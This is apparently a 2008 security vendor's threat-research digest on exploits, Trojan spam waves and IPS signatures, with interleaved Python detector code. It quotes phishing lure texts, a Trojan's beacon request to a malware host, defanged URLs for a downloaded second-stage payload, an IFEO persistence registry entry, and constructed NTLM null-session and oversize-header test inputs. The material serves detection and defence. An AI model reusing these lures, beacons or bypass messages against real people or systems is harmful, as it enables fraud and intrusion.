MS OneNote Handler Vulnerability (Sep 11, 2008)

Microsoft Office OneNote is a new component of the Microsoft Office Suite. Microsoft Office OneNote is a digital notebook that provides people one place to gather their notes and information, powerful search to find what they are looking for quickly, and easy-to-use shared notebooks so that they can manage information overload and work together more effectively.

Microsoft Office OneNote registers a protocol handler with the Windows registry, named “onenote” with the format “onenote://”. This handler enables the OneNote executable to be launched from the Microsoft Internet Explorer browser. The onenote handler, however, can trigger a buffer-overrun vulnerability in mso.dll, which can allow malicious executable code to be injected and executed on the target client.

Microsoft has released an advisory MS08-055 to address this vulnerability, which can be found here. In this advisory, the Maximum Security Impact of this vulnerability is scored as CRITICAL. To protect the SonicWALL customers from being affected by this vulnerability, the SonicWALL UTM team has developed the following IPS signatures:

  • 3482 MS OneNote URL Validation Error 4 (MS08-055)
  • 3479 MS OneNote URL Validation Error 3 (MS08-055)
  • 3476 MS OneNote URL Validation Error 2 (MS08-055)
  • 3474 MS OneNote URL Validation Error 1 (MS08-055)

Google Chrome Vulnerabilities (Sep 4, 2008)

On September 2nd 2008 Google released Chrome, an open source web browser. Chrome uses tabs as the primary component of its user interface. It uses the (open source) WebKit rendering engine on advice from the Android team.

One of Chrome’s design goals is improving security. This is achieved in three ways:
1. Each tab in Chrome is sandboxed into its own process.
2. Plugins are run in separate processes that communicate with the renderer.
3. Chrome periodically downloads updates of phishing and malware blacklists.

Just hours after the release, a few vulnerabilities in Google Chrome were discovered. One is that Chrome allows files (e.g., executables) to be automatically downloaded to the user’s computer without any user prompt. Another is a denial-of-service vulnerability; Chrome will crash when it loads a web page which has an undefined handler followed by a special character.

SonicWALL has tested and confirmed these vulnerabilities on Google Chrome version 0.2.149.27, Build 1583. Two signatures were released on September 3rd to detect and block attacks targeting these vulnerabilities. The signatures are:

  • (3458) WEB-CLIENT Google Chrome Automatic File Download PoC
  • (3459) WEB-CLIENT Google Chrome Undefined Handler DoS PoC

Spammed zipped Trojans (Sep 4, 2008)

SonicWALL UTM Research Team has observed multiple Trojan spam runs in the last week, starting August 27, 2008, a period that included the Labor Day weekend. The common element among all of the spam was that the Trojan arrives via e-mail in a zipped archive attachment.

Summary:

  • Western Union MTCN spam
  • Online Flight Ticket spam
  • Airmail Express delivery failure spam
  • Fedex Tracking number spam

Western Union MTCN spam

This spam wave started on August 27, 2008 and continued for 2 days. The e-mail contains a fake message about your Western Union money transfer transaction being halted or bounced. The e-mails look like the following:

Attachment:

  • RN67761263.zip (contains file RN67761263.exe)
  • In776162.zip (contains file In776162.exe)

Subjects: Western Union MTCN #<10 digit Number>

Message Body:
——————
Hello!

Attention! The wire sent to Maksim Zverev, Moscow, Russia has been blocked by our security service.

Your credit card issuing bank has halted the transaction by the demand of the Federal Criminal Investigation Service (case No. <5 digit number> since the recipient has been undergoing the international retrieval by the InterPol.

Please contact the closest Western Union office and make sure you have your ID card, the credit card that was used for making the payment, and the invoice file with you.

(The invoice file is attached to this message; please print it out and hand it to our agent.)

You can find the address of the closest Western Union agent on our website at http://www.westernunion.com

Thank you!
——————

SonicWALL detection for these Trojans:

  • GAV: Zbot.EJX (Trojan) [Hits recorded: 851]
  • GAV: ZBot.EJW (Trojan) [Hits recorded: 4,210]

Online Flight Ticket spam

The first wave of this spam was seen on August 28, 2008 and lasted just 1 day. Another wave of this spam campaign, with a different attachment name, started on Labor Day and continued until September 2, 2008. The e-mail pretends to contain an online flight ticket invoice. The e-mails look like the following:

Attachment:

  • eTicket_N832.zip (contains file eTicket_N832.exe)
  • e-Ticket_S737.zip (contains file e-Ticket_S737.exe)

Subjects: Your Online Flight Ticket N <5 digit number>

Message Body:
——————
Dear customers, Thank you for using our new service “Buy airplane ticket Online” on our website. Your account has been created:

Your login: Your password: pass<4 random characters>

Your credit card has been charged for $6XX.XX. [where X can be 0-9] We would like to remind you that whenever you order tickets on our website you get a discount of 10%! Attached to this message is the purchase Invoice and the flight ticket. To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

Kind regards, Virgin America
——————

SonicWALL detection for these Trojans:

  • GAV: AutoRun.WK (Worm) [Hits recorded: 7,892]
  • GAV: Emold.A_2 (Trojan) [Hits recorded: 107,996]

Airmail Express delivery failure spam

The first wave of this spam was seen on August 28, 2008 and lasted for 2 days. Another wave of this spam campaign, with a different attachment name, started on Labor Day and continued until September 3, 2008. The e-mail contains a fake message claiming that a postal package you sent could not be delivered, and it asks you to print out the attached copy of the invoice. The e-mails look like the following:

Attachment:

  • AIRMAIL#7661224.zip (contains file AIRMAIL#7661224.exe)
  • AIRMAIL_76612.zip (contains file AIRMAIL_76612.exe)
  • #876712.zip (contains file #876712.exe)
  • 5322412.zip (contains file 5322412.exe)

Subjects:

  • AIRMAIL EXPRESS $_ < random number >
  • Airmail Tracking number #<7 digit random number>

Message Body:
——————
Unfortunately we were not able to deliver postal package you sent on August the 1st in time because the recipients address is not correct. Please print out the invoice copy attached and collect the package at our office

AIRMAIL EXPRESS
——————

SonicWALL detection for these Trojans:

  • GAV: Zbot.AIR (Trojan) [Hits recorded: 198,947]
  • GAV: Zbot.EKQ (Trojan) [Hits recorded: 38]
  • GAV: Zbot.EMQ (Trojan) [Hits recorded: 266]
  • GAV: Zbot.EOD (Trojan) [Hits recorded: 4068]
  • GAV: Zbot.ENM (Trojan) [Hits recorded: 34,337]

Fedex Tracking number spam

This spam started on Labor Day and continued until September 2, 2008. The e-mail contains a fake message claiming that a postal package you sent could not be delivered, and it asks you to print out the attached copy of the invoice. The e-mails look like the following:

Attachment: TR87190-18721.doc.zip (contains file TR87190-18721.doc.exe)

Subjects: Tracking N <10 digit random number>

Message Body:
——————
Unfortunately we were not able to deliver postal package you sent on July the 25 in time because the recipients address is not correct. Please print out the invoice copy attached and collect the package at our office.

Your FEDEX www.fedex.com
——————

SonicWALL detection for these Trojans: GAV: Agent.ACCI (Trojan) [Hits recorded: 895]
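The one trait shared by all four campaigns above is an executable inside a zip attachment, sometimes behind a decoy extension such as TR87190-18721.doc.exe. The following Python detector is an added example (not SonicWALL's code): it walks the MIME parts of a raw message, opens any attachment that looks like a zip, and reports members that would execute on Windows. The extension deny-list, the sample message and the address examples are constructed assumptions.

```python
import email
import io
import zipfile
from email.message import EmailMessage

# Extensions Windows runs on double-click (assumption: a starter deny-list).
EXECUTABLE_EXTS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")

def executable_members(zip_bytes):
    """Return archive member names that would execute on Windows.  Matching is
    on the final extension, so 'TR87190-18721.doc.exe' is caught despite the
    '.doc' decoy; an unreadable archive is reported rather than ignored."""
    try:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return ["<unreadable archive>"]
    return [n for n in names if n.lower().endswith(EXECUTABLE_EXTS)]

def scan_message(raw):
    """Walk every MIME part of a raw message and return [(attachment name,
    [executable members])] for zip attachments carrying an executable."""
    msg = email.message_from_bytes(raw)
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        fname = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        # Trust neither the declared type nor the name alone: treat the part
        # as a zip if the name, the MIME type or the magic bytes say so.
        looks_like_zip = (fname.lower().endswith(".zip")
                          or part.get_content_type() in ("application/zip", "application/x-zip-compressed")
                          or payload[:2] == b"PK")
        if looks_like_zip:
            members = executable_members(payload)
            if members:
                findings.append((fname, members))
    return findings

def build_sample(attachment_name, member_name):
    """Constructed sample in the shape of the FedEx tracking-number spam; the
    zip member is a text stub, not malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, b"placeholder, not a PE file")
    msg = EmailMessage()
    msg["Subject"] = "Tracking N 0000000000"
    msg["From"] = "noreply@example.invalid"
    msg["To"] = "user@example.invalid"
    msg.set_content("Unfortunately we were not able to deliver postal package you sent ...")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="zip", filename=attachment_name)
    return msg.as_bytes()
```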

Symantec Veritas SFS Auth Bypass (Aug 28, 2008)

The Symantec Veritas Storage Foundation is a storage management suite. The product is composed of several services and agents. One of the services included in this suite is the Scheduler service which listens on TCP port 4888 by default. This is an RPC service with its own built in authentication mechanism.

The authentication mechanism in the Scheduler service utilizes the NT Lan Manager Security Support Provider (NTLM SSP) for security enforcement. The improper utilization of this component allows remote users to establish a NULL session with the service which effectively bypasses the authentication stage of the login procedure. This allows anonymous user logon to the affected service.

Exploitation of this vulnerability may allow anonymous malicious users to add, modify and delete snapshot schedules as well as potentially run malicious code. SonicWALL has released an IPS signature to detect and block possible attack attempts targeting this vulnerability. The following signature covers this issue:

  • (5204) Symantec Veritas SFW NTLMSSP Authentication Bypass PoC
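The bypass above rests on the service accepting an NTLM NULL session, which on the wire is an NTLMSSP AUTHENTICATE_MESSAGE carrying no user name and no challenge responses. The following Python parser is an added example (not SonicWALL's signature logic) that decodes such a message with bounds checks on every field descriptor and flags the anonymous form; the message builder exists only to produce test input, and the field layout modelled is the documented MS-NLMP type 3 header without the optional Version and MIC blocks.

```python
import struct

# Constants from MS-NLMP (assumption: only the fields needed here are modelled).
SIGNATURE = b"NTLMSSP\x00"
AUTHENTICATE_MESSAGE = 3
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_NEGOTIATE_ANONYMOUS = 0x00000800
HEADER_LEN = 64  # signature, type, six field descriptors, negotiate flags
FIELDS = ("lm_response", "nt_response", "domain", "user", "workstation", "session_key")

def build_authenticate(user, domain, lm_response, nt_response,
                       flags=NTLMSSP_NEGOTIATE_UNICODE):
    """Assemble a minimal AUTHENTICATE_MESSAGE so the detector can run offline."""
    blobs = (lm_response, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), b"", b"")
    descriptors, payload = b"", b""
    for blob in blobs:  # each descriptor: Len, MaxLen, Offset (little-endian)
        descriptors += struct.pack("<HHI", len(blob), len(blob), HEADER_LEN + len(payload))
        payload += blob
    return (SIGNATURE + struct.pack("<I", AUTHENTICATE_MESSAGE) + descriptors
            + struct.pack("<I", flags) + payload)

def parse_authenticate(data):
    """Decode the type 3 message into its variable-length fields, checking every
    (length, offset) pair against the buffer.  Because offsets are explicit, a
    real message that also carries Version/MIC before the payload parses too."""
    if len(data) < HEADER_LEN or data[:8] != SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    if struct.unpack_from("<I", data, 8)[0] != AUTHENTICATE_MESSAGE:
        raise ValueError("not an AUTHENTICATE_MESSAGE")
    fields = {}
    for i, name in enumerate(FIELDS):
        length, _max_len, offset = struct.unpack_from("<HHI", data, 12 + 8 * i)
        if offset + length > len(data):
            raise ValueError("field %s points outside the message" % name)
        fields[name] = data[offset:offset + length]
    fields["flags"] = struct.unpack_from("<I", data, 60)[0]
    return fields

def is_null_session(data):
    """True when the client authenticates anonymously: the ANONYMOUS flag is set,
    or (per MS-NLMP) the NT response is empty, the LM response is empty or a
    single zero byte, and no user name is supplied."""
    m = parse_authenticate(data)
    if m["flags"] & NTLMSSP_NEGOTIATE_ANONYMOUS:
        return True
    return (len(m["nt_response"]) == 0 and m["lm_response"] in (b"", b"\x00")
            and len(m["user"]) == 0)

# Constructed samples: an anonymous logon and an ordinary credentialed one.
NULL_SESSION = build_authenticate("", "", b"\x00", b"",
                                  NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_ANONYMOUS)
NORMAL_LOGON = build_authenticate("alice", "CORP", b"\x11" * 24, b"\x22" * 48)
```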

IBM Lotus Product IPS Signatures Summary

IBM Lotus series products were very popular years ago, and some customers still rely on them today. The products include Domino Web Server, Notes, Sametime Server/Client and so on.

Although the products are very useful to most customers, there are a lot of vulnerabilities in them. For example, there was an HTTP Header Accept-Language Buffer Overflow vulnerability in IBM Lotus Domino Server products. Whenever a relatively long string following the Accept-Language header is sent to a server running a vulnerable product, a stack buffer of the program is overwritten, and the stack return addresses or exception handlers are modified accordingly. This may allow an attacker to inject and execute malicious code.
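The Accept-Language overflow above is a length problem, so the corresponding network check is a length check on the header value. The following Python example is added here (not SonicWALL's signature) and shows the two details a naive check misses: an obsolete folded continuation line that splits the value, and repeated headers that a server may merge. The 256-byte limit and the sample requests are constructed assumptions.

```python
# Assumption: 256 bytes is a generous upper bound for a legitimate
# Accept-Language value (language ranges are short); tune for your traffic.
MAX_ACCEPT_LANGUAGE = 256

def parse_headers(raw):
    """Parse the header block of a raw HTTP request into (request line,
    [(name, value)]), unfolding obsolete continuations (a line starting with
    SP or HTAB extends the previous header) so a split value is measured whole."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    request_line, headers = lines[0], []
    for line in lines[1:]:
        if line[:1] in (b" ", b"\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + b" " + line.strip())
            continue
        if b":" not in line:
            raise ValueError("malformed header line: %r" % line)
        name, value = line.split(b":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return request_line, headers

def accept_language_overflow(raw, limit=MAX_ACCEPT_LANGUAGE):
    """Return the combined Accept-Language length if it exceeds `limit`, else 0.
    Repeated headers are joined with commas, as a merging server would see them."""
    _, headers = parse_headers(raw)
    values = [v for n, v in headers if n == b"accept-language"]
    total = len(b",".join(values))
    return total if total > limit else 0

# Constructed samples: a normal request, a folded oversize value, and an
# oversize value spread over two headers that are individually under the limit.
NORMAL = (b"GET /names.nsf HTTP/1.1\r\nHost: domino.example\r\n"
          b"Accept-Language: en-US,en;q=0.8\r\n\r\n")
FOLDED_OVERSIZE = (b"GET /names.nsf HTTP/1.1\r\nHost: domino.example\r\n"
                   b"Accept-Language: " + b"A" * 200 + b"\r\n " + b"A" * 200 + b"\r\n\r\n")
REPEATED_OVERSIZE = (b"GET /names.nsf HTTP/1.1\r\nHost: domino.example\r\n"
                     b"Accept-Language: " + b"B" * 150 + b"\r\n"
                     b"Accept-Language: " + b"B" * 150 + b"\r\n\r\n")
```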

SonicWALL UTM Research Team has spent a long time researching and developing signatures for these vulnerabilities, and the research is ongoing. We now have 36 signatures related to these vulnerabilities, listed below:

  • 1044 IBM Lotus Sametime Server Multiplexer BO 1
  • 1045 IBM Lotus Sametime Server Multiplexer BO 2
  • 1393 IBM Lotus Domino Web Access (inotes6W.dll) ActiveX Control BO Exploit
  • 1397 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO PoC
  • 1401 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO Exploit
  • 1555 IBM Lotus Notes DOC Attachment Viewer BO PoC
  • 1560 IBM Lotus Notes MIF Attachment Viewer BO Attempt 1
  • 1561 IBM Lotus Notes MIF Attachment Viewer BO Attempt 2
  • 1562 IBM Lotus Notes MIF Attachment Viewer BO Attempt 3
  • 1563 IBM Lotus Notes MIF Attachment Viewer BO Attempt 4
  • 1566 IBM Lotus Notes MIF Attachment Viewer BO Attempt 5
  • 1567 IBM Lotus Notes MIF Attachment Viewer BO Attempt 6
  • 1568 IBM Lotus Notes HTML Message Handling BO PoC 1
  • 1582 IBM Lotus Notes HTML Message Handling BO PoC 2
  • 2015 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 1
  • 2016 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 2
  • 2017 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 3
  • 2026 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 4
  • 3121 Lotus Domino Server 7.0 Denial of Service
  • 4025 IBM Lotus Domino LDAP Server Memory Exception PoC
  • 4026 IBM Lotus Notes HTML Speed Reader Long URL BO Attempt
  • 4327 IBM Lotus Notes UUE File Handling BO PoC
  • 4351 IBM Lotus Domino LDAP Invalid DN BO PoC
  • 4352 IBM Lotus Domino LDAP Invalid DN BO PoC 2
  • 4436 IBM Lotus Domino Web Access Message Handling DoS
  • 4438 IBM Lotus Domino Web Service DoS PoC
  • 4439 IBM Lotus Notes Cross Site Scripting PoC
  • 4463 Lotus Notes URI Handler Argument Injection PoC
  • 4563 IBM Lotus Notes Cross Site Scripting PoC 2
  • 4666 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO Exploit 2
  • 4779 IBM Lotus Domino Web Access (inotes6W.dll) ActiveX Control BO Exploit 2
  • 4940 IBM Lotus Notes Applix Graphics Parsing BO PoC
  • 4984 IBM Lotus Notes WPD Attachment BO PoC
  • 5027 IBM Lotus Domino Web Server HTTP Header BO PoC
  • 5157 IBM Lotus 1-2-3 Work Sheet File Viewer BO PoC
  • 5192 IBM Lotus Domino Accept-Language BO

These signatures have protected SonicWALL customers well from these attacks, and the following statistics show the last 2 months of attack attempts blocked by SonicWALL.

Flash ads hijack clipboard (Aug 21, 2008)


In these Web attacks, which affect Mac, Windows, and Linux users running Firefox, IE, and Safari, the bad guys seize control of the machine’s clipboard. This is a clever new way to spread malware. If someone replies to an e-mail, they may paste from the clipboard and get the URL. Likewise with blog posts, social-networking sites, and anywhere else you paste.

Flash banner ads are using ActionScript code to load (persistently) a malicious URL into the target’s clipboard. They may be using the Flash command setClipboard. The Flash9b.ocx module is used to parse the file. A number of legitimate sites have been seen to host ads carrying the attack, including Newsweek, Digg, and MSNBC.com.

The URL points to a fake anti-virus program. So-called rogue security programs either make bogus claims that the user’s machine is infected with malware in an attempt to dupe people into buying the software, or in some cases download malware rather than real antivirus software.

The particular variant used in this attack is FakeAlert.TY, which we alerted on July 18, 2008. SonicWALL blocks this attack proactively with the GAV: Fakealert.TY (Trojan) signature.

screenshot

We have also released a signature for a variant of the Flash copy-paste exploit – GAV: SWF.CB (Exploit). SonicWALL UTM Research Team is still monitoring for new variants of these attacks and will research them as soon as they appear.

New Contract Downloader Trojan (August 20, 2008)

Starting August 19, 2008, we are seeing a new Downloader-Trojan being spammed on the Internet. It arrives as an e-mail attachment in a zip archive. The e-mails look like the following:

Attachment: contract-N3.zip (contains file contract-N3.exe)

Subjects:

  • Your new labour contract
  • Contract of Retirement
  • Contract of settlements
  • Loan Contract
  • Permit for retirement
  • Record in debit of account

Message Body:

——————

Dear Sirs,

We have prepared a contract and added the paragraphs that you wanted to see in it. Our lawyers made alterations on the last page. If you agree with all the provisions we are ready to make the payment on Friday for the first consignment.

We are enclosing the file with the prepared contract.

If necessary, we can send it by fax. Looking forward to your decision.

——————

Upon execution, the malware executable creates a directory C:\Program Files\Microsoft Common and drops a copy of itself there as wuauclt.exe. It also adds the following registry entry to automatically start itself on system reboot:

HKLM\…\Image File Execution Options\explorer.exe\Debugger: C:\Program Files\Microsoft Common\wuauclt.exe
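An Image File Execution Options Debugger value makes Windows launch the named command every time that image starts, which is why the entry above survives reboots. The following Python example is added here (not from the SonicWALL post) and parses a .reg export of the IFEO key, listing every Debugger value and flagging those that are not a recognised debugger binary. The allow-list of debugger names and the sample export are constructed assumptions; the explorer.exe entry in the sample mirrors the one described above.

```python
import re

IFEO_MARKER = "\\image file execution options\\"
# Debugger binaries an analyst normally expects to see registered here
# (assumption: starter allow-list; extend it for vendor crash handlers).
KNOWN_DEBUGGERS = {"vsjitdebugger.exe", "drwtsn32.exe", "ntsd.exe", "windbg.exe"}

_SECTION = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
_VALUE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>(?:[^"\\]|\\.)*)"\s*$')

def unescape_reg_string(s):
    """Undo .reg escaping: a backslash quotes the next character."""
    return re.sub(r"\\(.)", r"\1", s)

def debugger_image(cmd):
    """Executable name at the head of a Debugger command line: a quoted path is
    taken up to the closing quote, otherwise the first token ending in .exe
    that is followed by whitespace or end of line."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        head = cmd[1:].split('"', 1)[0]
    else:
        m = re.match(r"(.+?\.exe)(?:\s|$)", cmd, re.IGNORECASE)
        head = m.group(1) if m else cmd.split()[0]
    return head.rsplit("\\", 1)[-1].lower()

def ifeo_debuggers(reg_text):
    """Parse a .reg export (decoded to str, BOM removed) and return
    [(image name, debugger command)] for each IFEO subkey with a Debugger value.
    Only REG_SZ ("...") values are handled; hex(2): expandable strings are not."""
    results, current_key = [], None
    for line in reg_text.splitlines():
        m = _SECTION.match(line)
        if m:
            current_key = m.group("key")
            continue
        if current_key is None or IFEO_MARKER not in current_key.lower():
            continue
        m = _VALUE.match(line)
        if m and m.group("name").lower() == "debugger":
            image = current_key.rsplit("\\", 1)[-1].lower()
            results.append((image, unescape_reg_string(m.group("data"))))
    return results

def suspicious_ifeo(reg_text):
    """Entries whose debugger is not a recognised debugger binary; anything
    else registered here is a persistence mechanism worth investigating."""
    return [(img, dbg) for img, dbg in ifeo_debuggers(reg_text)
            if debugger_image(dbg) not in KNOWN_DEBUGGERS]

# Constructed sample export: the entry from the post plus a benign JIT debugger.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe]
"Debugger"="C:\\Program Files\\Microsoft Common\\wuauclt.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="\"C:\\Windows\\System32\\vsjitdebugger.exe\" -p %ld -e %ld"
"""
```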

The Trojan also tries to connect to the aaszxu.ru domain, which is hosted in Ukraine, and sends the following GET request to it:

GET /load3/ld.php?v=1&rs=615903122&n=1 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: aaszxu.ru

This GET request in return loads the following URLs, which keep changing and point to another Trojan [detected as GAV: Wigon.EG (Trojan) by SonicWALL]:

  • hxxp://REMOVEDshclub.ro/img/scan.exe
  • hxxp://REMOVEDmickel.de/cerec/bilder/scan.exe
  • hxxp://REMOVEDnocorp.com/images/scan.exe

SonicWALL detects this new Trojan downloader as GAV: FakeAlert.GP (Trojan).

Postcard Storm Wave (Aug 6, 2008)


A new wave of e-mails was discovered with following subjects:

  • You Have An Ecard
  • A card for you
  • Someone sent you an Ecard.
  • Your Digital Greeting Card is waiting

They are pointing to the following domains:


Here are a few examples of such e-mails:

screenshot

The e-mail contains a fake message claiming your neighbor or flatmate has sent you a greeting card, along with a link. If the user clicks on the link, it opens a page that prompts the user to download a postcard.exe file, which is the new variant of the Storm worm.

screenshot

SonicWALL detects this new wave with the following signature:

GAV: Zhelatin.ZN_13 (Worm)

BBC Georgia's President Trojan (Aug 15, 2008)


Starting August 15, 2008, a new wave of malicious e-mails is being spammed with the following subjects:

  • BBC NEWS.
  • Weekly BBC NEWS.
  • Your subscription.

The headlines in the email claim that Georgian president Mikheil Saakashvili is gay. Messages contain a linked image of the President from the BBC website:

Emails include links that are pointing to the following domains:


All these locations redirect to a single IP (79.135.167.49).
The name of the malware is “name.avi.exe”.

SonicWALL detects this new wave with the following signature:

GAV: FakeAlert.gen (Trojan)

Remote Desktop Software (Aug 15, 2008)

Remote desktop software is software which allows graphical applications to be run remotely on a server, while being displayed locally. The remote desktop software consists of two separate computer programs, a “host version” that is installed on the computer to be controlled, and a “client version” that is installed on the controlling computer.

Remote desktop software can be divided into two categories. The first group doesn’t have a centralized server: the host version software and the client version software find each other directly. Examples of this type of software include Microsoft Remote Desktop Connection and software using the VNC protocol. When the host version software and the client version software sit in the same network they work pretty well. However, in the scenario where the client version software and the host version software sit in different networks, for example a home network and a corporate network, setting up the connection can be tricky.

The second group of remote desktop software uses a centralized server to track active peers. When the host version software starts, it signs in to the centralized server, which assigns a temporary ID to the machine. By providing that temporary ID to the centralized server, the client version software obtains the information it needs about the machine it is trying to reach. The host version software and the client version software then try to connect to each other, either directly or through the centralized server. Examples of this type of software include GoToMyPC and TeamViewer. Typically this type of software is very good at getting through firewalls.

Remote desktop software is made to increase computer users’ productivity. However, misusing the software could bring up security issues. Therefore some companies have policies that disallow the usage of remote desktop software from external networks.